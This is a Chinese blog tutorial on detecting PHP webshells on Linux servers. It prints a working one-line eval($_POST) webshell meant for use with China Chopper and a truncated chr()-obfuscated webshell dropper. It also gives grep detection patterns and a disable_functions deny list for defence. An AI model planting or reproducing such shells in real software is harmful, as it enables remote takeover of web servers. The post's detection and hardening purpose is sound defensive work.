知识屋:更实用的电脑技术知识网站
所在位置:首页 > 操作系统 > linux

linux查找webshell

发布时间:2014-09-05 13:59:56作者:知识屋

linux查找webshell
 
首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面
 
<?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接
 
隐藏很深的小马
 
fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).
。。。省略
 
解码:
其中chr括号里面的数字是美国信息交换标准代码,缩写:ASCII 可以找一份对照表对应一下
 
比如 46  就是 .
       47  就是 /
       32  就是 空格
 
也可以echo chr(46)解出来
<?php
echo chr(46).chr(47).chr(97).chr(46)
?>
 
WINDOWS下的应该有很多日志分析和查杀工具(很少用WIN表示不能举例),那么,LINUX下如何查找WEBSHELL呢?
 
 
1
find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|/(gunerpress|/(base64_decoolcode|spider_bc|shell_exec|passthru|/]/(/$/_/POST/[|eval/(str_rot13'>/opt/www.log &
然后就手工查看,写入计划任务啦。
只查小马的可以
 
 
1
grep -r --include=*.php  '[^a-z]eval($_POST' . > post.txt
2
grep -r --include=*.php  '[^a-z]eval($_REQUEST' . > REQUEST.txt
查出来了,重要的是要分析日志,查看入侵源头。
防范:
 
禁用危险函数,整理权限,防止权限过大
 
 
1
disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s
2
ymlink,popepassthru,stream_socket_server,fsocket
 
git 下来  只需要2个文件
shelldetect.php   //默认帐号密码 admin protect 
shelldetect.db
 
如果你有什么好的建议,感谢你的分享:)
 
PS:shell反弹
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜